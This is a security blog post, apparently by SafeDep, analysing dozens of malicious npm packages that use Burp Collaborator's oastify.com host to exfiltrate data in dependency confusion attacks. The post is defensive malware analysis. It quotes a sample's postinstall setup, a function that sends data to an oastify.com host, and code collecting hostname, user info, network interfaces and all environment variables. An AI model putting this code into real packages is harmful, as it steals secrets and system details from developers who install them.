Malicious npm Packages using Burp Collaborator for Dependency Confusion Attack
Table of Contents
Recently a Hacker News discussion on Snyk security researcher deploys malicious NPM packages targeting cursor.com highlighted interesting insights related to using Burp Collaborator’s oastify.com as Command and Control (C2) server for exfiltrating data. In this particular case, the researcher published multiple npm packages to the public npm registry apparently targeting internal packages at Cursor in a dependency confusion attack.
SafeDep Analysis
Our Malicious Package Scanner deployed to monitor npm registry for malicious packages identified similar patterns in multiple packages published during the month of January 2025. In fact a simple query identified 50+ such packages.
Looking at a Sample
We took a closer look at one of the samples pkg:/npm/patternfly-v5/[email protected]. The sample contained the following files:
-rw-r--r-- 1 dev wheel 1365 Oct 26 1985 index.js-rw-r--r-- 1 dev wheel 283 Oct 26 1985 package.json-rw-r--r-- 1 dev wheel 0 Oct 26 1985 patternfly-addons.css-rw-r--r-- 1 dev wheel 0 Oct 26 1985 patternfly.min.cssThe package.json had a postinstall script to execute the payload:
{ "name": "@patternfly-v5/patternfly", "version": "1.0.2", "description": "A package for testing supply chain attacks.", "main": "index.js", "scripts": { "postinstall": "echo 'Patternfly malicious package executed!'" }, "author": "Your Name", "license": "MIT"}The payload was in index.js and contained exfiltration logic such as
function sendData(path, data) { const options = { hostname: 'rzucd2dfiuz08dnqwkigu37xfolf95xu.oastify.com', port: 443, path: `/${path}`, method: 'GET', headers: { 'Content-Type': 'application/json', }, };
const req = https.request(options, (res) => { console.log(`Status: ${res.statusCode}`); });
req.on('error', (error) => { console.error(`Error: ${error.message}`); });
req.write(JSON.stringify(data)); req.end();}Followed by system information gathering code
const systemInfo = { hostname: os.hostname(), platform: os.platform(), arch: os.arch(), release: os.release(), userInfo: os.userInfo(), networkInterfaces: os.networkInterfaces(), env: process.env,};Example Packages using oastify.com for Exfiltration
Conclusion
All packages appeared to be similar in nature i.e. leveraged Burp Suite’s Collaborator service as a public endpoint for capturing exfiltrated data. We did not observe any sophistication or attempt to conceal malicious behavior. This potentially indicate red team activity or unsophisticated threat actor groups.
- npm
- malware
Author
SafeDep Team
safedep.io
Share
The Latest from SafeDep blogs
Follow for the latest updates and insights on open source security & engineering
Contributing to SafeDep Open Source Projects during Hacktoberfest 2025
Learn how to contribute to SafeDep open source projects during Hacktoberfest 2025 and help secure the open source software supply chain.
Shai-Hulud Supply Chain Attack Incident Response
The Shai-Hulud supply chain attack is a major incident targeting developers through malicious packages in the npm ecosystem. This post outlines the incident response steps that can be taken to...
Ship Code. Not Malware. SafeDep Launches GitHub App for Malicious Package Protection
SafeDep launches a GitHub App for zero-configuration protection against malicious open source packages. Instantly scan pull requests and keep your code repositories safe from supply chain attacks.
Diff-based SCA with AI is Broken — Real Examples from Pipfile.lock, yarn.lock, and Cargo.lock
Diff-based Software Composition Analysis (SCA) scanners in pull requests are prone to blind spots. By relying only on git diff data, they miss package context, suffer from nondeterministic...
Ship Code
Not Malware
Install the SafeDep GitHub App to keep malicious packages out of your repos.
Install GitHub App